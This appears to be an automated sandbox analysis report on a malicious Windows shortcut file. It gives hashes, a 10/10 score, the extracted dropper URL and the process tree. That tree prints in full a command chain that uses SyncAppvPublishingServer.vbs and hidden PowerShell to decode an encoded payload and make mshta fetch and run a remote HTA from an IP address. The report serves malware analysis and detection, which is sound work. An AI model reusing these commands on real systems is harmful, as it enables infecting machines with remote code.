Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/01/2024, 11:01

General

  • Target

    3ad8f87352fa728a50ddf29d9b8e0ceb78d54cfa6d91f485c6df06cd0898244c.lnk

  • Size

    1KB

  • MD5

    f5cd6dfa22f3364b0f940eb841d8ea5d

  • SHA1

    9969c00f4e7d9954423b79e995fa11015c8c5955

  • SHA256

    3ad8f87352fa728a50ddf29d9b8e0ceb78d54cfa6d91f485c6df06cd0898244c

  • SHA512

    60d347b1293b4bdb06feb3e98038db69207639a52e3e00ba802071079fac3e68e90573c1a28346f5f1c2911706a91962eed0f95b595b5d9a3893ddce688e76e4

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://45.153.243.208/a57

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\3ad8f87352fa728a50ddf29d9b8e0ceb78d54cfa6d91f485c6df06cd0898244c.lnk
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" ;542,548,537,549,530,465,537,549,549,545,491,480,480,485,486,479,482,486,484,479,483,485,484,479,483,481,489,480,530,486,488|%{$N+=[char]($_-433)};$N | powershell -
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer ;542,548,537,549,530,465,537,549,549,545,491,480,480,485,486,479,482,486,484,479,483,485,484,479,483,481,489,480,530,486,488|%{$N+=[char]($_-433)};$N | powershell -}
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\system32\mshta.exe
            "C:\Windows\system32\mshta.exe" http://45.153.243.208/a57
            5⤵
            • Blocklisted process makes network request
            PID:928

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icbz41r4.n5u.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/2224-26-0x00007FFEBDDD0000-0x00007FFEBE891000-memory.dmp

          Filesize

          10.8MB

        • memory/2224-27-0x0000026DDE400000-0x0000026DDE410000-memory.dmp

          Filesize

          64KB

        • memory/2224-31-0x00007FFEBDDD0000-0x00007FFEBE891000-memory.dmp

          Filesize

          10.8MB

        • memory/2224-28-0x0000026DDE400000-0x0000026DDE410000-memory.dmp

          Filesize

          64KB

        • memory/3088-16-0x000001F8F9350000-0x000001F8F936C000-memory.dmp

          Filesize

          112KB

        • memory/3088-11-0x000001F8F6A00000-0x000001F8F6A10000-memory.dmp

          Filesize

          64KB

        • memory/3088-14-0x000001F8F9270000-0x000001F8F9325000-memory.dmp

          Filesize

          724KB

        • memory/3088-12-0x000001F8F6A00000-0x000001F8F6A10000-memory.dmp

          Filesize

          64KB

        • memory/3088-35-0x00007FFEBDDD0000-0x00007FFEBE891000-memory.dmp

          Filesize

          10.8MB

        • memory/3088-15-0x00007FFEBECB0000-0x00007FFEBED65000-memory.dmp

          Filesize

          724KB

        • memory/3088-10-0x00007FFEBDDD0000-0x00007FFEBE891000-memory.dmp

          Filesize

          10.8MB

        • memory/3088-13-0x000001F8F6A00000-0x000001F8F6A10000-memory.dmp

          Filesize

          64KB

        • memory/3088-2-0x000001F8F90E0000-0x000001F8F9102000-memory.dmp

          Filesize

          136KB